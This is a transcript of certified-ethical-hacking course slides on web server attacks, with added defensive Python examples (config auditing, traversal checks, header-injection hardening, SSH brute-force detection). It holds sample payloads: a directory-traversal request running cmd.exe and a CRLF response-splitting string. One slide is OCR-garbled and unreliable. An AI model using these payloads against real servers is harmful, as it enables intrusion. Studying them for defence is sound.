Hacking Webservers

Module 12
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker

Cehv8 - Module 12: Hacking Webservers

2,606 views

Published on

Cehv8
Module 12: Hacking Webservers

Download here:
CCNAv5:
ccna5vn.wordpress.com
Cehv8:
cehv8vn.blogspot.com

Published in: Education

Cehv8 - Module 12: Hacking Webservers

  1. Hacking Webservers. Module 12.
  2. Ethical Hacking and Countermeasures, Exam 312-50 Certified Ethical Hacker. Hacking Webservers, Module 12. Engineered by Hackers. Presented by Professionals. Ethical Hacking and Countermeasures v8, Module 12: Hacking Webservers, Exam 312-50. Module 12 Page 1601. Ethical Hacking and Countermeasures Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.
  3. Security News. GoDaddy Outage Takes Down Millions of Sites, Anonymous Member Claims Responsibility (Monday, September 10th, 2012). Source: http://techcrunch.com. Final update: GoDaddy is up, and claims that the outage was due to internal errors and not a DDoS attack. According to many customers, sites hosted by major web host and domain registrar GoDaddy are down. According to the official GoDaddy Twitter account the company is aware of the issue and is working to resolve it. Update: Customers are complaining that GoDaddy hosted e-mail accounts are down as well, along with GoDaddy phone service and all sites using GoDaddy's DNS service. Update 2: A member of Anonymous known as AnonymousOwn3r is claiming responsibility, and makes it clear this is not an Anonymous collective action. A tipster tells us that the technical reason for the failure is being caused by the inaccessibility of GoDaddy's DNS servers; specifically, CNS1.SECURESERVER.NET, CNS2.SECURESERVER.NET, and CNS3.SECURESERVER.NET are failing to resolve.
  4. AnonymousOwn3r's bio reads "Security leader of #Anonymous ("Official member")." The individual claims to be from Brazil, and hasn't issued a statement as to why GoDaddy was targeted. Last year GoDaddy was pressured into opposing SOPA as customers transferred domains off the service, and the company has been the center of a few other controversies. However, AnonymousOwn3r has tweeted "I'm not anti go daddy, you guys will understand because i did this attack." Copyright © 2012 AOL Inc. By Klint Finley, http://techcrunch.com/2012/09/10/godaddy-outage-takes-down-millions-of-sites
  5. Module Objectives. Often, a breach in security causes more damage in terms of goodwill than in actual quantifiable loss. This makes web server security critical to the normal functioning of an organization. Most organizations consider their web presence to be an extension of themselves. This module attempts to highlight the various security concerns in the context of web servers. After finishing this module, you will be able to understand a web server and its architecture, how an attacker hacks it, the different types of attacks that an attacker can carry out on web servers, the tools used in web server hacking, etc. Exploring web server security is a vast domain, and delving into the finer details of the discussion is beyond the scope of this module. This module familiarizes you with:
     - IIS Web Server Architecture
     - Why Web Servers Are Compromised
     - Impact of Webserver Attacks
     - Webserver Attacks
     - Webserver Attack Methodology
     - Webserver Attack Tools
     - Metasploit Architecture
     - Web Password Cracking Tools
     - Countermeasures
     - How to Defend Against Web Server Attacks
     - Patch Management
     - Patch Management Tools
     - Webserver Security Tools
     - Webserver Pen Testing Tools
     - Webserver Pen Testing
  6. Module Flow. To understand hacking web servers, first you should know what a web server is, how it functions, and what the other elements associated with it are. All of these are simply termed web server concepts, so we will discuss web server concepts first. The module flow is: Webserver Concepts, Webserver Attacks, Attack Methodology, Webserver Attack Tools, Webserver Pen Testing, Webserver Security Tools, Patch Management, and Counter-measures. This section gives you a brief overview of the web server and its architecture. It also explains the common mistakes that allow attackers to compromise a web server, and describes the impact of attacks on the web server.
  7. Web Server Market Shares. Source: http://w3techs.com. The following statistics show the percentages of websites using various web servers (Apache, Microsoft IIS, Nginx, LiteSpeed, Google Server, Tomcat, and Lighttpd). From the statistics, it is clear that Apache holds the largest share, i.e., 64.6%. Below that is Microsoft IIS.
  8. Figure 12.1: Web Server Market Shares (bar chart of Apache, Microsoft IIS, Nginx, LiteSpeed, Google Server, Tomcat, and Lighttpd; horizontal axis 0 to 80%).
  9. Open Source Web Server Architecture. The diagram below illustrates the basic components of open source web server architecture. Diagram labels: Site Users and Attacks reaching the server over the Internet; on the server, Linux, File System, Apache, Email, PHP, Applications, Compiled Extension, and MySQL.
  10. Figure 12.2: Open Source Web Server Architecture. Where:
      - Linux: the server's operating system
      - Apache: the web server component
      - MySQL: a relational database
      - PHP: the application layer
  11. IIS Web Server Architecture. Internet Information Services (IIS) for Windows Server is a flexible, secure, and easy-to-manage web server for hosting anything on the web. IIS is a web server application developed by Microsoft that can be used with Microsoft Windows. It is the second largest web server after Apache HTTP Server, occupying around 17.4% of the total market share. It supports HTTP, HTTPS, FTP, FTPS, SMTP, and NNTP. The diagram that follows illustrates the basic components of IIS web server architecture. Diagram labels: Client; HTTP Protocol Stack (HTTP.SYS) in Kernel Mode; in User Mode, Svchost.exe, Windows Activation Service, WWW Service, Application Pool, Web Server Core, Native Modules (anonymous authentication, managed engine, IIS certificate mapping, static file, default document, HTTP cache, HTTP errors, and HTTP logging), AppDomain, Managed Modules, External Apps, and applicationHost.config; the request pipeline runs begin request processing, authentication, authorization, cache resolution, handler mapping, handler pre-execution, release state, update cache, update log, and end request processing.
  12. Figure 12.3: IIS Web Server Architecture.
  13. Website Defacement. Website defacement is the process by which hackers change the content of a website or web page. Hackers break into web servers and alter the hosted website by creating something new. Web defacement occurs when an intruder maliciously alters the visual appearance of a web page by inserting or substituting provocative and frequently offensive data. Defaced pages expose visitors to propaganda or misleading information until the unauthorized change is discovered and corrected.
  14. Figure 12.4: Website Defacement (a browser showing http://juggyboy.com/index.aspx replaced with "HACKED! Hi Master, Your website owned by US, Hacker! Next target: microsoft.com").
  15. Why Web Servers Are Compromised. There are inherent security risks associated with web servers, the local area networks that host websites, and the users who access these websites using browsers.
     - From a webmaster's perspective, the biggest security concern is that the web server can expose the local area network (LAN) or the corporate intranet to the threats the Internet poses. This may be in the form of viruses, Trojans, attackers, or the compromise of information itself. Software bugs present in large, complex programs are often considered the source of imminent security lapses; web servers are themselves large, complex programs and come with these inherent risks. In addition, the open architecture of web servers allows arbitrary scripts to run on the server side while replying to remote requests. Any CGI script installed at the site may contain bugs that are potential security holes.
     - From a network administrator's perspective, a poorly configured web server poses another potential hole in the local network's security. While the objective of a web server is to provide controlled access to the network, too much control can make a web server almost impossible to use. In an intranet environment, the network administrator has to be careful about configuring the web server so that legitimate users are recognized and authenticated, and the various groups of users are assigned distinct access privileges.
  16. End User's Concern: Usually, the end user does not perceive any immediate threat, as surfing the web appears both safe and anonymous. However, active content, such as ActiveX controls and Java applets, makes it possible for harmful applications, such as viruses, to invade the user's system. Besides, active content from a website browser can be a conduit for malicious software to bypass the firewall system and permeate the local area network. The table that follows shows the causes and consequences of web server compromises:
      - Installing the server with default settings
      - Unnecessary default, backup, or sample files
      - Improper file and directory permissions
      - Security conflicts with business ease-of-use case
      - Default accounts with their default or no passwords
      - Misconfigurations in web server, operating systems, and networks
      - Unpatched security flaws in the server software, OS, and applications
      - Lack of proper security policy, procedures, and maintenance
      - Misconfigured SSL certificates and encryption settings
      - Bugs in server software, OS, and web applications
      - Use of self-signed certificates and default certificates
      - Improper authentication with external systems
      - Unnecessary services enabled, including content management and remote administration
      - Administrative or debugging functions that are enabled or accessible
      Table 12.1: Causes and consequences of web server compromises
  17. Impact of Web Server Attacks. Attackers can cause various kinds of damage to an organization by attacking a web server. The damage includes:
      - Compromise of user accounts: Web server attacks are mostly concentrated on user account compromise. If the attacker is able to compromise a user account, the attacker can gain a lot of useful information and can use the compromised account to launch further attacks on the web server.
      - Data tampering: An attacker can alter or delete the data, and can even replace it with malware so that whoever connects to the web server also becomes compromised.
      - Website defacement: Hackers completely change the look of the website by replacing the original data; they change the visuals and display different pages with messages of their own.
      - Secondary attacks from the website: Once an attacker compromises a web server, he or she can use the server to launch further attacks on various websites or client systems.
      - Data theft: Data is one of the main assets of the company. Attackers can get access to sensitive company data, such as the source code of a particular program.
  18. Root access to other applications or servers: Root access is the highest privilege one gets to log in to a network, be it a dedicated server, a semi-dedicated server, or a virtual private server. Attackers can perform any action once they get root access to the server.
  19. Module Flow. Now that you are familiar with web server concepts, we move on to the possible attacks on web servers. Each and every action online is performed with the help of a web server, so it is considered a critical resource of an organization, and that is the very reason attackers target web servers. There are many attack techniques used by attackers to compromise web servers; we will now discuss those techniques: ... attack, HTTP response splitting attack, web cache poisoning attack, HTTP response hijacking, web application attacks, etc. Module flow: Webserver Concepts, Webserver Attacks, Attack Methodology, Webserver Attack Tools, Webserver Pen Testing, Webserver Security Tools, Patch Management, Counter-measures.
20. Web Server Misconfiguration
- Verbose debug/error messages
- Remote administration functions
- Anonymous or default users/passwords
- Unnecessary services enabled
- Sample configuration and script files
- Misconfigured/default SSL certificates
Web servers have various vulnerabilities related to configuration, applications, files, scripts, or web pages. Once an attacker finds such a vulnerability, for example a remotely accessible administration function, it becomes a doorway into the company's network. These loopholes in the server can help attackers bypass user authentication. Server misconfiguration refers to configuration weaknesses in web infrastructure that can be exploited to launch various attacks on web servers such as directory traversal, server intrusion, and data theft. Once detected, these problems can be easily exploited and can result in the total compromise of a website. Remote administration functions can give the attacker a way to break into the server, and unnecessary services left enabled are also exposed to hacking. Other common misconfigurations are misconfigured or default SSL certificates, verbose debug/error messages, anonymous or default users/passwords, and sample configuration and script files.
Module 12 Page 1619
21. Web Server Misconfiguration Example
Consider the httpd.conf file on an Apache server.
FIGURE 12.5: httpd.conf file on an Apache server (a <Location> block with "SetHandler server-status" and no access restriction)
This configuration allows anyone to view the server status page, which contains detailed information about the current use of the web server, including information about the current hosts and requests being processed.
Consider another example, the php.ini file.
FIGURE 12.6: php.ini file on an Apache server
This configuration gives verbose error messages.
Module 12 Page 1620
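The two figures above show the weak settings but not how to check for them. The following is an added example (not part of the course material): it audits configuration text for an unrestricted /server-status handler and for PHP display_errors, with a weak and a corrected sample of each; all config samples are constructed.

```python
"""Added example (not from the course material): audit the two settings the
figures describe, an unrestricted Apache /server-status handler and PHP
display_errors, in configuration text. Config samples are constructed."""
import re

# Constructed httpd.conf fragment in the weak form shown on the slide:
# the status handler is enabled with no access restriction at all.
HTTPD_CONF_WEAK = """
<Location /server-status>
    SetHandler server-status
</Location>
"""

# Corrected form: same handler, but limited to localhost and an admin network.
HTTPD_CONF_FIXED = """
<Location /server-status>
    SetHandler server-status
    Require local
    Require ip 10.0.0.0/8
</Location>
"""

# Constructed php.ini fragments: weak (errors shown to clients) and corrected.
PHP_INI_WEAK = "display_errors = On\nlog_errors = Off\n"
PHP_INI_FIXED = "display_errors = Off\nlog_errors = On\nerror_log = /var/log/php_errors.log\n"

LOCATION_RE = re.compile(r"<Location\s+([^>\s]+)\s*>(.*?)</Location>", re.S | re.I)
RESTRICT_RE = re.compile(r"^\s*(Require\s+(local|ip|host)\b|Deny\s+from\b)", re.I | re.M)


def audit_httpd_conf(text):
    """Return one finding per <Location> that enables server-status without a
    Require (Apache 2.4) or Deny-from (Apache 2.2) restriction in the block."""
    findings = []
    for match in LOCATION_RE.finditer(text):
        path, body = match.group(1), match.group(2)
        if not re.search(r"SetHandler\s+server-status", body, re.I):
            continue
        if not RESTRICT_RE.search(body):
            findings.append(f"{path}: server-status exposed without an access restriction")
    return findings


def parse_ini(text):
    """Minimal php.ini reader: key = value pairs, ';' comments ignored."""
    settings = {}
    for line in text.splitlines():
        line = line.split(";", 1)[0].strip()
        if "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            settings[key.lower()] = value.strip('"').lower()
    return settings


def audit_php_ini(text):
    """Flag verbose error output. PHP's compiled-in default for display_errors
    is On, so a missing directive is reported as well."""
    settings = parse_ini(text)
    findings = []
    if settings.get("display_errors", "1") in ("1", "on", "stdout", "stderr"):
        findings.append("display_errors is On: verbose errors are sent to clients")
    if settings.get("log_errors") in ("0", "off"):
        findings.append("log_errors is Off: errors are not recorded server-side")
    return findings
```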
22. Directory Traversal Attacks
In directory traversal attacks, attackers use the ../ (dot-dot-slash) sequence to access restricted directories outside of the web server root directory. Attackers can use a trial-and-error method to navigate outside of the root directory and access sensitive information in the system.
Request shown on the slide: http://server.com/scripts/..%5c../Windows/System32/cmd.exe?/c+dir+c:
FIGURE 12.7: Directory Traversal Attacks (the request above returns a directory listing of drive C: from the web server)
Web servers are designed in such a way that public access is limited to some extent. Directory traversal is an exploitation of HTTP through which attackers are able to access restricted directories and execute commands outside of the web server root directory by manipulating a URL. Attackers can use the trial-and-error method to navigate outside of the root directory and access sensitive information in the system.
Module 12 Page 1621
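The following is an added example (not from the course material) of the server-side check that defeats the request in Figure 12.7: it decodes the path fully, treats the %5c backslash as a separator, normalises the result and refuses anything that climbs above the document root. WEB_ROOT is a constructed value; it also handles double-encoded and null-byte variants beyond the single case on the slide.

```python
"""Added example (not from the course material): a server-side path check that
refuses the ..%5c../ style request shown in Figure 12.7 as well as plain and
double-encoded ../ sequences. WEB_ROOT is a constructed value."""
import os
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"   # assumed document root for this example


def decode_fully(raw, max_rounds=3):
    """Percent-decode until stable so that double-encoded sequences such as
    %252e%252e are judged in their final form, not as harmless literals."""
    current = raw
    for _ in range(max_rounds):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    return current


def resolve_request_path(url_path, web_root=WEB_ROOT):
    """Map a request path to a filesystem path under web_root.
    Returns the absolute path, or None when the request would leave the root
    (the server should then answer 400/403 rather than touch the filesystem)."""
    path_only = url_path.split("?", 1)[0]         # drop the query string
    decoded = decode_fully(path_only)
    if "\x00" in decoded:                         # null-byte truncation tricks
        return None
    decoded = decoded.replace("\\", "/")          # IIS accepted %5c as a separator
    relative = decoded.lstrip("/")
    normalized = posixpath.normpath(relative)     # collapses ./ and x/../
    # After normalisation any surviving '..' means the path climbed above root
    if normalized == ".." or normalized.startswith("../"):
        return None
    candidate = web_root if normalized == "." else os.path.join(web_root, normalized)
    # Belt and braces: confirm containment on the final string as well
    if os.path.commonpath([web_root, candidate]) != web_root:
        return None
    return candidate
```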
  23. 23. Ethital Hacking and (ountermeasures Exam 31250 Certified Ethical Hacker Hacking Webservers HTTP Response Splitting Attack C E H «. .ui. .a um: I. .. I HTTP response splitting attack involves adding header response data into the input field so that the server split the response into two H‘r1'p/1.1 zoo ox res pon S65 Set—Cookie: author= Jason The attacker can control the first response to redirect user to a malicious website whereas the other responses will be discarded by web browser 5 ti’-'in9 3“ U101‘ = Setecookie: author= JasonTheHacker request . get: Paramet: er (AUTHOR_PA HTTP/1.1 200 OK RAM): Cookie cookie = new Cookie("author", author): cookie. setMAxAga(cookieExpirat ion); response. addCookie(cookie): HTTP/1.1 200 OK Copyright 0 by ES-Giil. All Rights Reserved. Reproduction is Srricuy Prohibited. » HTTP Response Splitting Attack _, An HTTP response attack is a web-based attack where a server is tricked by injecting new lines into response headers along with arbitrary code are some of the examples for this type of attacks. The attacker alters a single request to appear and be processed by the web server as two requests. The web server in turn responds to each request. This is accomplished by adding header response data into the input field. An attacker passes malicious data to a vulnerable application, and the application includes the data in an HTTP response header. The attacker can control the first response to redirect the user to a malicious website, whereas the other responses will be Module 12 Page 1622 Ethical Hacking and Countermeasures Copyright (O by All Rights Reserved. Reprodtirtion is Strictly Piohibited.
24. Vulnerable servlet code shown in the figure (the author parameter is copied into a cookie header unchecked):
    String author = request.getParameter(AUTHOR_PARAM);
    Cookie cookie = new Cookie("author", author);
    cookie.setMaxAge(cookieExpiration);
    response.addCookie(cookie);
Normal response: HTTP/1.1 200 OK with Set-Cookie: author=Jason
Input = JasonTheHacker\r\nHTTP/1.1 200 OK\r\n
First response (controlled by attacker):
    HTTP/1.1 200 OK
    Set-Cookie: author=JasonTheHacker
Second response:
    HTTP/1.1 200 OK
FIGURE 12.8: HTTP Response Splitting Attack
Module 12 Page 1623
25. Web Cache Poisoning Attack
An attacker forces the web server's cache to flush its actual cache content and sends a specially crafted request, which will be stored in the cache.
[Slide figure: attacker and web server cache, with the vulnerable redirect script <?php header("Location: " . $_GET['page']); ?>, a request for http://www.juggyboy.com/index.html sent with Pragma: no-cache to remove the page from the cache, a malicious redirect request that splits the response, and the resulting poisoned server cache]
Web cache poisoning is an attack against the reliability of an intermediate web cache, in which the legitimate content cached for an arbitrary URL is swapped with malicious content. Users of the web cache can unknowingly receive the poisoned content instead of the true and secure content when they request that URL through the web cache. An attacker forces the web server's cache to flush its actual cache content and sends a specially crafted request to be stored in the cache. The following diagram explains the whole process of web cache poisoning step by step.
Module 12 Page 1624
26. FIGURE 12.9: Web Cache Poisoning Attack (steps shown: 1. attacker sends a request to remove the page from the cache; 2. normal response after clearing the cache; 3. attacker sends a malicious request; 4. attacker gets the first server response; 5. attacker requests juggyboy.com again to generate a cache entry; 6. the cache now holds a page that points to the attacker's page)
Module 12 Page 1625
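Both the Set-Cookie case of Figure 12.8 and the Location redirect of Figure 12.9 rest on the same defect, a header value that may contain CR/LF. The following added example (not the course's servlet or PHP code) is a minimal response builder showing how such a value turns one response into two that a browser or cache reads sequentially, beside the hardened builder that refuses control characters; all inputs are constructed.

```python
"""Added example (not the course's servlet or PHP code): a minimal response
builder showing how an unchecked header value from the Set-Cookie example
(Figure 12.8) or the Location redirect (Figure 12.9) splits one response into
two, beside the hardened form that refuses control characters. All inputs are
constructed."""

CRLF = "\r\n"


class HeaderInjection(ValueError):
    """Raised by the hardened builder when a header value carries CR/LF/NUL."""


def build_response_vulnerable(header_name, value, body="<html>ok</html>"):
    """Copies user input into a header unchecked, like the slide's
    new Cookie("author", author). With CRLF in value, the byte stream that
    reaches the browser or cache reads as two complete responses."""
    headers = [
        "HTTP/1.1 200 OK",
        f"{header_name}: {value}",
        "Content-Type: text/html",
        f"Content-Length: {len(body)}",
    ]
    return CRLF.join(headers) + CRLF + CRLF + body


def safe_header_value(value):
    """Hardened form: reject rather than strip. A bare LF also splits headers
    on lenient parsers, so all three control characters are refused."""
    if any(ch in value for ch in "\r\n\x00"):
        raise HeaderInjection("control character in header value")
    return value


def build_response_hardened(header_name, value, body="<html>ok</html>"):
    return build_response_vulnerable(header_name, safe_header_value(value), body)


def status_lines(raw):
    """Every status line in the stream; more than one means the response split."""
    return [line for line in raw.split(CRLF) if line.startswith("HTTP/1.")]


def injected_response(raw):
    """The attacker-controlled second response, exactly as a cache that reads
    the stream sequentially would store it, or None if there is none."""
    idx = raw.find(CRLF + CRLF + "HTTP/1.")
    return None if idx < 0 else raw[idx + len(CRLF) * 2:]


# Constructed attacker input modelled on the slides: the cookie value closes
# the first response and starts a second one. The future Last-Modified date is
# what makes a cache keep the injected page (Figure 12.9).
ATTACK_BODY = "<html>Attack page</html>"
SPLIT_INPUT = (
    "JasonTheHacker" + CRLF + CRLF
    + "HTTP/1.1 200 OK" + CRLF
    + "Content-Type: text/html" + CRLF
    + "Last-Modified: Mon, 27 Oct 2031 14:50:18 GMT" + CRLF
    + f"Content-Length: {len(ATTACK_BODY)}" + CRLF + CRLF
    + ATTACK_BODY
)
```

The second response's own Content-Length bounds its body, so whatever the server appends after it is what the slide calls the discarded remainder.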
27. HTTP Response Hijacking
HTTP response hijacking is accomplished with a response splitting request. In this attack, the attacker first sends a response splitting request to the web server. The server splits the response into two and sends the first response to the attacker and the second response to the victim. On receiving the response from the web server, the victim requests a service by giving credentials. At the same time, the attacker requests the index page. The web server then sends the response to the victim's request to the attacker, and the victim remains uninformed. The diagram that follows shows the step-by-step procedure of an HTTP response hijacking attack.
Module 12 Page 1626
28. FIGURE 12.10: HTTP Response Hijacking (attacker, web server and victim: response splitting request; first response; request for service; attacker requests the index page; attacker gets the response to the victim's request)
Module 12 Page 1627
29. SSH Bruteforce Attack
SSH protocols are used to create an encrypted SSH tunnel between two hosts in order to transfer unencrypted data over an insecure network. Attackers can brute-force SSH login credentials to gain unauthorized access to an SSH tunnel. SSH tunnels can be used to transmit malware and other exploits to victims without being detected.
[Slide figure: attacker reaching an SSH server over the Internet, behind which sit the mail server, web server, application server, file server and users]
SSH Brute Force Attack
In order to conduct an attack on SSH, the attacker first scans the SSH server to identify possible vulnerabilities. With the help of a brute force attack, the attacker gains the login credentials. Once the attacker has the SSH login credentials, he or she uses the same SSH tunnel to transmit malware and other exploits to victims without being detected.
FIGURE 12.11: SSH Brute Force Attack
Module 12 Page 1628
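The slide describes the attack but not what it leaves in the logs. The following added example (not from the course material) runs detection logic over constructed sshd auth-log lines: a burst of failures from one source inside a short window, and a password login that immediately follows such a burst, which is the signal a fail2ban-style jail or SIEM rule keys on. The year supplied to the timestamp parser is an assumption, since syslog lines carry none.

```python
"""Added example (not from the course material): detection logic for SSH
password brute forcing over constructed sshd auth-log lines. It flags a burst
of failures from one source and a password login that follows such a burst."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample in the syslog format sshd writes to /var/log/auth.log.
SAMPLE_LOG = """\
Oct 12 03:14:01 web1 sshd[2201]: Failed password for root from 203.0.113.7 port 51000 ssh2
Oct 12 03:14:02 web1 sshd[2203]: Failed password for root from 203.0.113.7 port 51002 ssh2
Oct 12 03:14:03 web1 sshd[2205]: Failed password for invalid user admin from 203.0.113.7 port 51004 ssh2
Oct 12 03:14:04 web1 sshd[2207]: Failed password for invalid user test from 203.0.113.7 port 51006 ssh2
Oct 12 03:14:05 web1 sshd[2209]: Failed password for root from 203.0.113.7 port 51008 ssh2
Oct 12 03:14:07 web1 sshd[2211]: Accepted password for root from 203.0.113.7 port 51010 ssh2
Oct 12 03:20:00 web1 sshd[2300]: Failed password for alice from 198.51.100.4 port 40000 ssh2
Oct 12 03:20:30 web1 sshd[2302]: Accepted publickey for alice from 198.51.100.4 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)


def parse_line(line, year=2024):
    """Return a dict for Failed/Accepted events, None for other lines.
    Syslog timestamps carry no year, so one is supplied (assumed value)."""
    match = LINE_RE.match(line)
    if not match:
        return None
    ts = datetime.strptime(f"{year} {match['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "ok": match["result"] == "Accepted",
            "user": match["user"], "ip": match["ip"], "method": match["method"]}


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Sliding window of failure timestamps per source IP.
    Returns (ip, kind, detail) tuples in log order."""
    recent = defaultdict(deque)
    alerted = set()
    alerts = []
    for line in log_text.splitlines():
        event = parse_line(line)
        if event is None:
            continue
        window = recent[event["ip"]]
        while window and (event["ts"] - window[0]).total_seconds() > window_seconds:
            window.popleft()
        if not event["ok"]:
            window.append(event["ts"])
            if len(window) >= threshold and event["ip"] not in alerted:
                alerted.add(event["ip"])
                alerts.append((event["ip"], "bruteforce",
                               f"{len(window)} failures within {window_seconds}s"))
        elif window and event["method"] == "password":
            # A password success right after a failure run is the signature of
            # a guessed credential; a key-based login after one failure is not.
            alerts.append((event["ip"], "success-after-failures",
                           f"{event['user']} via password after {len(window)} failures"))
    return alerts
```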
30. Man-in-the-Middle Attack
Man-in-the-middle (MITM) attacks allow an attacker to access sensitive information by intercepting and altering communications between an end user and web servers. The attacker acts as a proxy so that all communication between the user and the web server passes through him. The attacker sniffs the communication to steal session IDs.
A man-in-the-middle attack is a method in which an intruder intercepts or modifies the messages exchanged between the user and the web server by eavesdropping on or intruding into a connection. This allows the attacker to steal sensitive user information such as online banking details, user names, passwords, etc. transferred over the Internet to the web server. The attacker lures the victim into connecting to the web server through him by pretending to be a proxy. If the victim believes and accepts the attacker's request, all communication between the user and the web server passes through the attacker, who can then steal sensitive user information.
Module 12 Page 1629
31. FIGURE 12.12: Man-in-the-Middle Attack (user visits a website; normal traffic; attacker sniffs the communication to steal session IDs)
Module 12 Page 1630
32. Web Server Password Cracking
An attacker tries to exploit weaknesses to hack well-chosen passwords. Many hacking attempts start with cracking passwords and proving to the web server that the attacker is a valid user. Attackers use different methods such as social engineering, spoofing, phishing, using a Trojan horse or virus, wiretapping, keystroke logging, etc. The most common passwords found are password, root, administrator, admin, demo, test, guest, qwerty, pet names, etc. Attackers mainly target web form authentication cracking, SSH tunnels, FTP servers, SMTP servers, and web shares.
Most hacking starts with password cracking. Once the password is cracked, the hacker can log in to the network as an authorized person. The most common passwords found are password, root, administrator, admin, demo, test, guest, QWERTY, pet names, etc. Attackers use different methods such as social engineering, spoofing, phishing, using a Trojan horse or virus, wiretapping, keystroke logging, brute force attacks, dictionary attacks, etc. to crack passwords. Attackers mainly target:
- Web form authentication cracking
- SSH tunnels
- FTP servers
- SMTP servers
- Web shares
Module 12 Page 1631
33. Webserver Password Cracking Techniques
Passwords may be cracked manually or with automated tools such as Cain and Abel, Brutus, THC Hydra, etc. Passwords can be cracked by using the following techniques: guessing (by humans or by automated tools provided with dictionaries), dictionary attack, and brute force attack (the most time-consuming, but comprehensive, way to crack a password: every combination of characters is tried until the password is broken).
Attackers follow various techniques to crack the password:
- Guessing: A common cracking method used by attackers is to guess passwords, either by humans or by automated tools provided with dictionaries. Most people tend to use their pets' names, loved ones' names, license plate numbers, dates of birth, or other weak passwords such as "QWERTY," "password," "admin," etc. so that they can remember them easily. The same habit allows the attacker to crack passwords by guessing.
- Dictionary attack: A dictionary attack uses a predefined list of words in various combinations. It may not be effective if the password consists of special characters and symbols, but compared to a brute force attack it is less time consuming.
- Brute force attack: In the brute force method, all possible characters are tested, for example uppercase letters from "A to Z," numbers from "0 to 9," or lowercase letters from "a to z." This method is useful for identifying one-word or two-word passwords, whereas if a password consists of uppercase and lowercase letters and special characters, it might take months or years to crack, which is practically impossible.
Module 12 Page 1632
34.
- Hybrid attack: A hybrid attack is more powerful as it combines a dictionary attack with a brute force attack, also trying symbols and numbers. Password cracking becomes easier with this method.
Module 12 Page 1633
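The four techniques above differ in how much work they need, which is what a password-set-time check should measure. The following added example (not from the course material) classifies a candidate by the cheapest technique that recovers it: a dictionary hit, a hybrid derivation (dictionary word plus a few digits or symbols, optionally leet-substituted), or an exhaustive brute force over the character classes it uses. The word list, leet map and hybrid rule sizes are constructed simplifications.

```python
"""Added example (not from the course material): rank how each technique on the
slides (dictionary, hybrid, brute force) would recover a candidate password,
as a check to run when a password is set. The word list and the hybrid rule
are constructed simplifications."""
import string

# Constructed mini word list built from the slide's common passwords; a real
# check would load a large list such as the ones cracking tools ship with.
COMMON_WORDS = {"password", "root", "administrator", "admin", "demo", "test",
                "guest", "qwerty", "fluffy", "rex", "welcome"}

# Leet substitutions a hybrid rule set would undo (constructed subset).
LEET = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a", "5": "s",
                      "7": "t", "@": "a", "$": "s"})
EXTRAS = string.digits + string.punctuation
MAX_LEADING, MAX_TRAILING = 2, 5        # affixes the modelled hybrid rules try
HYBRID_VARIANTS_PER_WORD = 10 ** 7      # rough size of that rule set (constructed)

CHAR_CLASSES = [(set(string.ascii_lowercase), 26), (set(string.ascii_uppercase), 26),
                (set(string.digits), 10), (set(string.punctuation), 32)]


def hybrid_base_word(candidate):
    """Return the dictionary word a hybrid attack would reach the candidate from
    (word plus a few leading/trailing digits or symbols, optional leet), or None."""
    lowered = candidate.lower()
    no_lead = lowered.lstrip(EXTRAS)
    core = no_lead.rstrip(EXTRAS)
    leading = len(lowered) - len(no_lead)
    trailing = len(no_lead) - len(core)
    if not core or leading > MAX_LEADING or trailing > MAX_TRAILING:
        return None
    word = core.translate(LEET)
    return word if word in COMMON_WORDS else None


def brute_force_keyspace(candidate):
    """Keyspace an exhaustive search covers: alphabet size ** length, where the
    alphabet is the union of character classes the password actually uses."""
    alphabet = sum(size for chars, size in CHAR_CLASSES if any(c in chars for c in candidate))
    return alphabet ** len(candidate)


def classify(candidate, guesses_per_second=10 ** 9):
    """Return (technique, guesses, seconds): the cheapest applicable technique,
    the number of guesses it needs, and the time at the given guess rate."""
    if candidate.lower() in COMMON_WORDS:
        technique, work = "dictionary", len(COMMON_WORDS)
    elif hybrid_base_word(candidate) is not None:
        technique, work = "hybrid", len(COMMON_WORDS) * HYBRID_VARIANTS_PER_WORD
    else:
        technique, work = "brute force", brute_force_keyspace(candidate)
    return technique, work, work / guesses_per_second
```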
35. Web Application Attacks
Vulnerabilities in web applications running on a web server provide a broad attack path for web server compromise.
[Slide figure: directory traversal, parameter/form tampering, cookie tampering, command injection, buffer overflow, cross-site scripting (XSS), denial-of-service (DoS), unvalidated input and file injection, cross-site request forgery (CSRF), SQL injection, session hijacking]
Note: For complete coverage of web application attacks refer to Module 13: Hacking Web Applications.
Directory Traversal: Directory traversal is an exploitation of HTTP through which attackers are able to access restricted directories and execute commands outside of the web server root directory by manipulating a URL.
Parameter/Form Tampering: This type of tampering attack is intended to manipulate the parameters exchanged between client and server in order to modify application data, such as user credentials and permissions, or the price and quantity of products.
Cookie Tampering: Cookie tampering is the method of poisoning or tampering with the client's cookie. Most of these attacks take place when a cookie is sent from the client side to the server. Persistent and non-persistent cookies can be modified using different tools.
Module 12 Page 1634
36. Command Injection Attacks: Command injection is an attack method in which a hacker alters the content of a web page by using HTML code and by identifying form fields that lack valid constraints.
Buffer Overflow Attacks: Most web applications are designed to sustain a certain amount of data. If that amount is exceeded, the application may crash or exhibit some other vulnerable behavior. The attacker takes advantage of this and floods the application with too much data, which in turn causes a buffer overflow.
Cross-Site Scripting (XSS) Attacks: Cross-site scripting is a method in which an attacker injects HTML tags or scripts into a target website.
Denial-of-Service (DoS) Attack: A denial-of-service attack is an attack method intended to terminate the operations of a website or a server and make it unavailable to its intended users.
Unvalidated Input and File Injection Attacks: Unvalidated input and file injection attacks refer to attacks carried out by supplying unvalidated input or by injecting files into a web application.
Cross-Site Request Forgery (CSRF) Attack: The user's web browser is made by a malicious web page to send requests to a malicious website where various vulnerable actions not intended by the user are performed. This kind of attack is dangerous in the case of financial websites.
SQL Injection Attacks: SQL injection is a code injection technique that uses a security vulnerability of a database for attacks. The attacker injects malicious code into strings that are later passed to the SQL server for execution.
